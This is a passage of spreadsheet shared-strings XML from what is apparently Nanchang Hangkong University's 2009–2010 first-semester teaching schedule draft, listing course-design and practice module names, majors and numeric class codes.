  <si>
    <t xml:space="preserve">模拟法庭（民诉）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">播音与主持实践</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">3</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">播音与主持实践</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">专业综合设计</t>
  </si>
  <si>
    <t xml:space="preserve">游戏开发课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">电力系统分析课程设计或现代交流调速技术课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">信号系统与信号处理课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">单片机应用及计算机控制系统课程设计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">电气控制技术及</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">PLC</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">应用课程设计</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">计算机控制系统课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">计算机网络课程设计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">DirectX</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">课程设计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">电气控制与</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">PLC</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">技术课程设计</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">模拟电子线路课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">数据结构课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">机器学习课程设计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">C</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">语言课程设计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">课题设计</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">平面印刷设计与制作</t>
  </si>
  <si>
    <t xml:space="preserve">课题研究实践</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">专题设计实践</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">专业考察</t>
  </si>
  <si>
    <t xml:space="preserve">专业课程作业展示</t>
  </si>
  <si>
    <t xml:space="preserve">模型制作</t>
  </si>
  <si>
    <t xml:space="preserve">写生</t>
  </si>
  <si>
    <t xml:space="preserve">艺术实践</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">综合实践</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">5</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">综合实践</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">3</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">综合实践</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">表演（空中乘务方向）</t>
  </si>
  <si>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="16"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">南昌航空大学</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="16"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2009</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="16"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">～</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="16"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2010</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="16"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">学年第一学期教学进程表（预案）</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="11"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2009</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7</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="11"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">日</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">年</t>
  </si>
  <si>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">09</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">年</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">10</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">年</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">月</t>
  </si>
  <si>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">一</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">.</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">二</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">日</t>
  </si>
  <si>
    <t xml:space="preserve">寒  假</t>
  </si>
  <si>
    <t xml:space="preserve">班                      周</t>
  </si>
  <si>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">1.16</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">～</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">2.28</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">01</t>
  </si>
  <si>
    <t xml:space="preserve">06</t>
  </si>
  <si>
    <t xml:space="preserve">060111-6</t>
  </si>
  <si>
    <t xml:space="preserve">金属材料工程</t>
  </si>
  <si>
    <t xml:space="preserve">060121</t>
  </si>
  <si>
    <t xml:space="preserve">060122</t>
  </si>
  <si>
    <t xml:space="preserve">060123</t>
  </si>
  <si>
    <t xml:space="preserve">060124</t>
  </si>
  <si>
    <t xml:space="preserve">060125</t>
  </si>
  <si>
    <t xml:space="preserve">060131</t>
  </si>
  <si>
    <t xml:space="preserve">060132</t>
  </si>
  <si>
    <t xml:space="preserve">060141</t>
  </si>
  <si>
    <t xml:space="preserve">060142</t>
  </si>
  <si>
    <t xml:space="preserve">02</t>
  </si>
  <si>
    <t xml:space="preserve">060211</t>
  </si>
  <si>
    <t xml:space="preserve">060212</t>
  </si>
  <si>
    <t xml:space="preserve">060213</t>
  </si>
  <si>
    <t xml:space="preserve">060214</t>
  </si>
  <si>
    <t xml:space="preserve">060221</t>
  </si>
  <si>
    <t xml:space="preserve">060222</t>
  </si>
  <si>
    <t xml:space="preserve">060231</t>
  </si>
  <si>
    <t xml:space="preserve">060232</t>
  </si>
  <si>
    <t xml:space="preserve">060233</t>
  </si>
  <si>
    <t xml:space="preserve">03</t>
  </si>
  <si>
    <t xml:space="preserve">060311</t>
  </si>
  <si>
    <t xml:space="preserve">060312</t>
  </si>
  <si>
    <t xml:space="preserve">060313</t>
  </si>
  <si>
    <t xml:space="preserve">060314</t>
  </si>
  <si>
    <t xml:space="preserve">060315</t>
  </si>
  <si>
    <t xml:space="preserve">060316</t>
  </si>
  <si>
    <t xml:space="preserve">060317</t>
  </si>
  <si>
    <t xml:space="preserve">060318</t>
  </si>
  <si>
    <t xml:space="preserve">060321</t>
  </si>
  <si>
    <t xml:space="preserve">060322</t>
  </si>
  <si>
    <t xml:space="preserve">060331</t>
  </si>
  <si>
    <t xml:space="preserve">060332</t>
  </si>
  <si>
    <t xml:space="preserve">060341</t>
  </si>
  <si>
    <t xml:space="preserve">060342</t>
  </si>
  <si>
    <t xml:space="preserve">04</t>
  </si>
  <si>
    <t xml:space="preserve">060411</t>
  </si>
  <si>
    <t xml:space="preserve">060412</t>
  </si>
  <si>
    <t xml:space="preserve">060413</t>
  </si>
  <si>
    <t xml:space="preserve">060414</t>
  </si>
  <si>
    <t xml:space="preserve">060421</t>
  </si>
  <si>
    <t xml:space="preserve">060422</t>
  </si>
  <si>
    <t xml:space="preserve">05</t>
  </si>
  <si>
    <t xml:space="preserve">060511</t>
  </si>
  <si>
    <t xml:space="preserve">060512</t>
  </si>
  <si>
    <t xml:space="preserve">060513</t>
  </si>
  <si>
    <t xml:space="preserve">060514</t>
  </si>
  <si>
    <t xml:space="preserve">060531</t>
  </si>
  <si>
    <t xml:space="preserve">060532</t>
  </si>
  <si>
    <t xml:space="preserve">060611</t>
  </si>
  <si>
    <t xml:space="preserve">060612</t>
  </si>
  <si>
    <t xml:space="preserve">060613</t>
  </si>
  <si>
    <t xml:space="preserve">060621</t>
  </si>
  <si>
    <t xml:space="preserve">060622</t>
  </si>
  <si>
    <t xml:space="preserve">060623</t>
  </si>
  <si>
    <t xml:space="preserve">060631</t>
  </si>
  <si>
    <t xml:space="preserve">062011</t>
  </si>
  <si>
    <t xml:space="preserve">062012</t>
  </si>
  <si>
    <t xml:space="preserve">062013</t>
  </si>
  <si>
    <t xml:space="preserve">062014</t>
  </si>
  <si>
    <t xml:space="preserve">062015</t>
  </si>
  <si>
    <t xml:space="preserve">062016</t>
  </si>
  <si>
    <t xml:space="preserve">062017</t>
  </si>
  <si>
    <t xml:space="preserve">07</t>
  </si>
  <si>
    <t xml:space="preserve">060711</t>
  </si>
  <si>
    <t xml:space="preserve">信息与计算科学</t>
  </si>
  <si>
    <t xml:space="preserve">060721</t>
  </si>
  <si>
    <t xml:space="preserve">08</t>
  </si>
  <si>
    <t xml:space="preserve">060811</t>
  </si>
  <si>
    <t xml:space="preserve">060812</t>
  </si>
  <si>
    <t xml:space="preserve">060821</t>
  </si>
  <si>
    <t xml:space="preserve">060822</t>
  </si>
  <si>
    <t xml:space="preserve">060831</t>
  </si>
  <si>
    <t xml:space="preserve">060832</t>
  </si>
  <si>
    <t xml:space="preserve">060841</t>
  </si>
  <si>
    <t xml:space="preserve">09</t>
  </si>
  <si>
    <t xml:space="preserve">060911</t>
  </si>
  <si>
    <t xml:space="preserve">060912</t>
  </si>
  <si>
    <t xml:space="preserve">060921</t>
  </si>
  <si>
    <t xml:space="preserve">060922</t>
  </si>
  <si>
    <t xml:space="preserve">060923</t>
  </si>
  <si>
    <t xml:space="preserve">060931</t>
  </si>
  <si>
    <t xml:space="preserve">060932</t>
  </si>
  <si>
    <t xml:space="preserve">060941</t>
  </si>
  <si>
    <t xml:space="preserve">060942</t>
  </si>
  <si>
    <t xml:space="preserve">060951</t>
  </si>
  <si>
    <t xml:space="preserve">060952</t>
  </si>
  <si>
    <t xml:space="preserve">社会体育</t>
  </si>
  <si>
    <t xml:space="preserve">061011</t>
  </si>
  <si>
    <t xml:space="preserve">061111</t>
  </si>
  <si>
    <t xml:space="preserve">061112</t>
  </si>
  <si>
    <t xml:space="preserve">061113</t>
  </si>
  <si>
    <t xml:space="preserve">061121</t>
  </si>
  <si>
    <t xml:space="preserve">061122</t>
  </si>
  <si>
    <t xml:space="preserve">艺术设计</t>
  </si>
  <si>
    <t xml:space="preserve">061211</t>
  </si>
  <si>
    <t xml:space="preserve">061212</t>
  </si>
  <si>
    <t xml:space="preserve">061213</t>
  </si>
  <si>
    <t xml:space="preserve">061214</t>
  </si>
  <si>
    <t xml:space="preserve">061215</t>
  </si>
  <si>
    <t xml:space="preserve">工业设计</t>
  </si>
  <si>
    <t xml:space="preserve">061231</t>
  </si>
  <si>
    <t xml:space="preserve">061232</t>
  </si>
  <si>
    <t xml:space="preserve">061233</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">06</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">动画</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">06</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">环艺</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">06</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">环艺</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">06</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">装潢</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">06</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">装潢</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">社会工作</t>
  </si>
  <si>
    <t xml:space="preserve">061411</t>
  </si>
  <si>
    <t xml:space="preserve">061421</t>
  </si>
  <si>
    <t xml:space="preserve">061431</t>
  </si>
  <si>
    <t xml:space="preserve">061441</t>
  </si>
  <si>
    <t xml:space="preserve">音乐</t>
  </si>
  <si>
    <t xml:space="preserve">061221</t>
  </si>
  <si>
    <t xml:space="preserve">061222</t>
  </si>
  <si>
    <t xml:space="preserve">061223</t>
  </si>
  <si>
    <t xml:space="preserve">061224</t>
  </si>
  <si>
    <t xml:space="preserve">061225</t>
  </si>
  <si>
    <t xml:space="preserve">070111</t>
  </si>
  <si>
    <t xml:space="preserve">-</t>
  </si>
  <si>
    <t xml:space="preserve">070112</t>
  </si>
  <si>
    <t xml:space="preserve">070113</t>
  </si>
  <si>
    <t xml:space="preserve">070114</t>
  </si>
  <si>
    <t xml:space="preserve">070115</t>
  </si>
  <si>
    <t xml:space="preserve">070116</t>
  </si>
  <si>
    <t xml:space="preserve">070121</t>
  </si>
  <si>
    <t xml:space="preserve">070122</t>
  </si>
  <si>
    <t xml:space="preserve">070123</t>
  </si>
  <si>
    <t xml:space="preserve">070124</t>
  </si>
  <si>
    <t xml:space="preserve">070125</t>
  </si>
  <si>
    <t xml:space="preserve">070126</t>
  </si>
  <si>
    <t xml:space="preserve">070131</t>
  </si>
  <si>
    <t xml:space="preserve">070132</t>
  </si>
  <si>
    <t xml:space="preserve">070141</t>
  </si>
  <si>
    <t xml:space="preserve">070142</t>
  </si>
  <si>
    <t xml:space="preserve">070211</t>
  </si>
  <si>
    <t xml:space="preserve">070212</t>
  </si>
  <si>
    <t xml:space="preserve">070213</t>
  </si>
  <si>
    <t xml:space="preserve">070214</t>
  </si>
  <si>
    <t xml:space="preserve">070221</t>
  </si>
  <si>
    <t xml:space="preserve">070222</t>
  </si>
  <si>
    <t xml:space="preserve">070231</t>
  </si>
  <si>
    <t xml:space="preserve">070232</t>
  </si>
  <si>
    <t xml:space="preserve">070311</t>
  </si>
  <si>
    <t xml:space="preserve">070312</t>
  </si>
  <si>
    <t xml:space="preserve">070313</t>
  </si>
  <si>
    <t xml:space="preserve">070314</t>
  </si>
  <si>
    <t xml:space="preserve">070315</t>
  </si>
  <si>
    <t xml:space="preserve">070316</t>
  </si>
  <si>
    <t xml:space="preserve">070317</t>
  </si>
  <si>
    <t xml:space="preserve">070321</t>
  </si>
  <si>
    <t xml:space="preserve">070322</t>
  </si>
  <si>
    <t xml:space="preserve">070331</t>
  </si>
  <si>
    <t xml:space="preserve">070332</t>
  </si>
  <si>
    <t xml:space="preserve">070341</t>
  </si>
  <si>
    <t xml:space="preserve">070342</t>
  </si>
  <si>
    <t xml:space="preserve">070411</t>
  </si>
  <si>
    <t xml:space="preserve">070412</t>
  </si>
  <si>
    <t xml:space="preserve">070413</t>
  </si>
  <si>
    <t xml:space="preserve">070414</t>
  </si>
  <si>
    <t xml:space="preserve">070421</t>
  </si>
  <si>
    <t xml:space="preserve">070422</t>
  </si>
  <si>
    <t xml:space="preserve">070511</t>
  </si>
  <si>
    <t xml:space="preserve">070512</t>
  </si>
  <si>
    <t xml:space="preserve">070513</t>
  </si>
  <si>
    <t xml:space="preserve">070514</t>
  </si>
  <si>
    <t xml:space="preserve">070521</t>
  </si>
  <si>
    <t xml:space="preserve">070531</t>
  </si>
  <si>
    <t xml:space="preserve">070611</t>
  </si>
  <si>
    <t xml:space="preserve">070612</t>
  </si>
  <si>
    <t xml:space="preserve">070613</t>
  </si>
  <si>
    <t xml:space="preserve">070621</t>
  </si>
  <si>
    <t xml:space="preserve">070622</t>
  </si>
  <si>
    <t xml:space="preserve">070623</t>
  </si>
  <si>
    <t xml:space="preserve">070631</t>
  </si>
  <si>
    <t xml:space="preserve">072011</t>
  </si>
  <si>
    <t xml:space="preserve">072012</t>
  </si>
  <si>
    <t xml:space="preserve">072013</t>
  </si>
  <si>
    <t xml:space="preserve">072014</t>
  </si>
  <si>
    <t xml:space="preserve">072015</t>
  </si>
  <si>
    <t xml:space="preserve">072016</t>
  </si>
  <si>
    <t xml:space="preserve">070711</t>
  </si>
  <si>
    <t xml:space="preserve">070712</t>
  </si>
  <si>
    <t xml:space="preserve">070721</t>
  </si>
  <si>
    <t xml:space="preserve">070811</t>
  </si>
  <si>
    <t xml:space="preserve">070812</t>
  </si>
  <si>
    <t xml:space="preserve">070813</t>
  </si>
  <si>
    <t xml:space="preserve">070821</t>
  </si>
  <si>
    <t xml:space="preserve">070822</t>
  </si>
  <si>
    <t xml:space="preserve">070831</t>
  </si>
  <si>
    <t xml:space="preserve">070832</t>
  </si>
  <si>
    <t xml:space="preserve">070841</t>
  </si>
  <si>
    <t xml:space="preserve">070911</t>
  </si>
  <si>
    <t xml:space="preserve">070912</t>
  </si>
  <si>
    <t xml:space="preserve">070921</t>
  </si>
  <si>
    <t xml:space="preserve">070922</t>
  </si>
  <si>
    <t xml:space="preserve">070931</t>
  </si>
  <si>
    <t xml:space="preserve">070932</t>
  </si>
  <si>
    <t xml:space="preserve">070941</t>
  </si>
  <si>
    <t xml:space="preserve">070942</t>
  </si>
  <si>
    <t xml:space="preserve">070951</t>
  </si>
  <si>
    <t xml:space="preserve">070952</t>
  </si>
  <si>
    <t xml:space="preserve">071011</t>
  </si>
  <si>
    <t xml:space="preserve">071111</t>
  </si>
  <si>
    <t xml:space="preserve">071112</t>
  </si>
  <si>
    <t xml:space="preserve">071113</t>
  </si>
  <si>
    <t xml:space="preserve">071121</t>
  </si>
  <si>
    <t xml:space="preserve">071122</t>
  </si>
  <si>
    <t xml:space="preserve">071211</t>
  </si>
  <si>
    <t xml:space="preserve">071212</t>
  </si>
  <si>
    <t xml:space="preserve">071213</t>
  </si>
  <si>
    <t xml:space="preserve">071214</t>
  </si>
  <si>
    <t xml:space="preserve">071215</t>
  </si>
  <si>
    <t xml:space="preserve">071216</t>
  </si>
  <si>
    <t xml:space="preserve">071231</t>
  </si>
  <si>
    <t xml:space="preserve">071232</t>
  </si>
  <si>
    <t xml:space="preserve">071233</t>
  </si>
  <si>
    <t xml:space="preserve">071234</t>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3</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2</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">071411</t>
  </si>
  <si>
    <t xml:space="preserve">071421</t>
  </si>
  <si>
    <t xml:space="preserve">071431</t>
  </si>
  <si>
    <t xml:space="preserve">071441</t>
  </si>
  <si>
    <t xml:space="preserve">071221</t>
  </si>
  <si>
    <t xml:space="preserve">071222</t>
  </si>
  <si>
    <t xml:space="preserve">071223</t>
  </si>
  <si>
    <t xml:space="preserve">071224</t>
  </si>
  <si>
    <t xml:space="preserve">071225</t>
  </si>
  <si>
    <t xml:space="preserve">071226</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FFFF0000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">国际经济与贸易</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">05</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">072211</t>
  </si>
  <si>
    <t xml:space="preserve">072212</t>
  </si>
  <si>
    <t xml:space="preserve">072213</t>
  </si>
  <si>
    <t xml:space="preserve">072214</t>
  </si>
  <si>
    <t xml:space="preserve">酒店管理</t>
  </si>
  <si>
    <t xml:space="preserve">072241</t>
  </si>
  <si>
    <t xml:space="preserve">072242</t>
  </si>
  <si>
    <t xml:space="preserve">080111</t>
  </si>
  <si>
    <t xml:space="preserve">080112</t>
  </si>
  <si>
    <t xml:space="preserve">080113</t>
  </si>
  <si>
    <t xml:space="preserve">080114</t>
  </si>
  <si>
    <t xml:space="preserve">080115</t>
  </si>
  <si>
    <t xml:space="preserve">080116</t>
  </si>
  <si>
    <t xml:space="preserve">080121</t>
  </si>
  <si>
    <t xml:space="preserve">080122</t>
  </si>
  <si>
    <t xml:space="preserve">080123</t>
  </si>
  <si>
    <t xml:space="preserve">080124</t>
  </si>
  <si>
    <t xml:space="preserve">080125</t>
  </si>
  <si>
    <t xml:space="preserve">080126</t>
  </si>
  <si>
    <t xml:space="preserve">080127</t>
  </si>
  <si>
    <t xml:space="preserve">080131</t>
  </si>
  <si>
    <t xml:space="preserve">080132</t>
  </si>
  <si>
    <t xml:space="preserve">080141</t>
  </si>
  <si>
    <t xml:space="preserve">080142</t>
  </si>
  <si>
    <t xml:space="preserve">080211</t>
  </si>
  <si>
    <t xml:space="preserve">080212</t>
  </si>
  <si>
    <t xml:space="preserve">080213</t>
  </si>
  <si>
    <t xml:space="preserve">080221</t>
  </si>
  <si>
    <t xml:space="preserve">080222</t>
  </si>
  <si>
    <t xml:space="preserve">080231</t>
  </si>
  <si>
    <t xml:space="preserve">080232</t>
  </si>
  <si>
    <t xml:space="preserve">080233</t>
  </si>
  <si>
    <t xml:space="preserve">给排水工程</t>
  </si>
  <si>
    <t xml:space="preserve">080241</t>
  </si>
  <si>
    <t xml:space="preserve">080311</t>
  </si>
  <si>
    <t xml:space="preserve">080312</t>
  </si>
  <si>
    <t xml:space="preserve">080313</t>
  </si>
  <si>
    <t xml:space="preserve">080314</t>
  </si>
  <si>
    <t xml:space="preserve">080315</t>
  </si>
  <si>
    <t xml:space="preserve">080316</t>
  </si>
  <si>
    <t xml:space="preserve">080317</t>
  </si>
  <si>
    <t xml:space="preserve">080321</t>
  </si>
  <si>
    <t xml:space="preserve">080322</t>
  </si>
  <si>
    <t xml:space="preserve">080323</t>
  </si>
  <si>
    <t xml:space="preserve">080331</t>
  </si>
  <si>
    <t xml:space="preserve">080332</t>
  </si>
  <si>
    <t xml:space="preserve">080333</t>
  </si>
  <si>
    <t xml:space="preserve">080341</t>
  </si>
  <si>
    <t xml:space="preserve">080342</t>
  </si>
  <si>
    <t xml:space="preserve">080411</t>
  </si>
  <si>
    <t xml:space="preserve">080412</t>
  </si>
  <si>
    <t xml:space="preserve">080413</t>
  </si>
  <si>
    <t xml:space="preserve">080414</t>
  </si>
  <si>
    <t xml:space="preserve">080415</t>
  </si>
  <si>
    <t xml:space="preserve">080421</t>
  </si>
  <si>
    <t xml:space="preserve">080422</t>
  </si>
  <si>
    <t xml:space="preserve">080423</t>
  </si>
  <si>
    <t xml:space="preserve">080511</t>
  </si>
  <si>
    <t xml:space="preserve">080512</t>
  </si>
  <si>
    <t xml:space="preserve">080513</t>
  </si>
  <si>
    <t xml:space="preserve">080514</t>
  </si>
  <si>
    <t xml:space="preserve">080521</t>
  </si>
  <si>
    <t xml:space="preserve">080531</t>
  </si>
  <si>
    <t xml:space="preserve">080611</t>
  </si>
  <si>
    <t xml:space="preserve">080612</t>
  </si>
  <si>
    <t xml:space="preserve">080613</t>
  </si>
  <si>
    <t xml:space="preserve">080621</t>
  </si>
  <si>
    <t xml:space="preserve">080622</t>
  </si>
  <si>
    <t xml:space="preserve">080623</t>
  </si>
  <si>
    <t xml:space="preserve">080631</t>
  </si>
  <si>
    <t xml:space="preserve">082011</t>
  </si>
  <si>
    <t xml:space="preserve">082012</t>
  </si>
  <si>
    <t xml:space="preserve">082013</t>
  </si>
  <si>
    <t xml:space="preserve">082014</t>
  </si>
  <si>
    <t xml:space="preserve">082015</t>
  </si>
  <si>
    <t xml:space="preserve">080711</t>
  </si>
  <si>
    <t xml:space="preserve">080712</t>
  </si>
  <si>
    <t xml:space="preserve">080721</t>
  </si>
  <si>
    <t xml:space="preserve">080811</t>
  </si>
  <si>
    <t xml:space="preserve">080812</t>
  </si>
  <si>
    <t xml:space="preserve">080813</t>
  </si>
  <si>
    <t xml:space="preserve">080814</t>
  </si>
  <si>
    <t xml:space="preserve">080821</t>
  </si>
  <si>
    <t xml:space="preserve">080822</t>
  </si>
  <si>
    <t xml:space="preserve">080823</t>
  </si>
  <si>
    <t xml:space="preserve">080831</t>
  </si>
  <si>
    <t xml:space="preserve">080832</t>
  </si>
  <si>
    <t xml:space="preserve">080841</t>
  </si>
  <si>
    <t xml:space="preserve">080911</t>
  </si>
  <si>
    <t xml:space="preserve">080912</t>
  </si>
  <si>
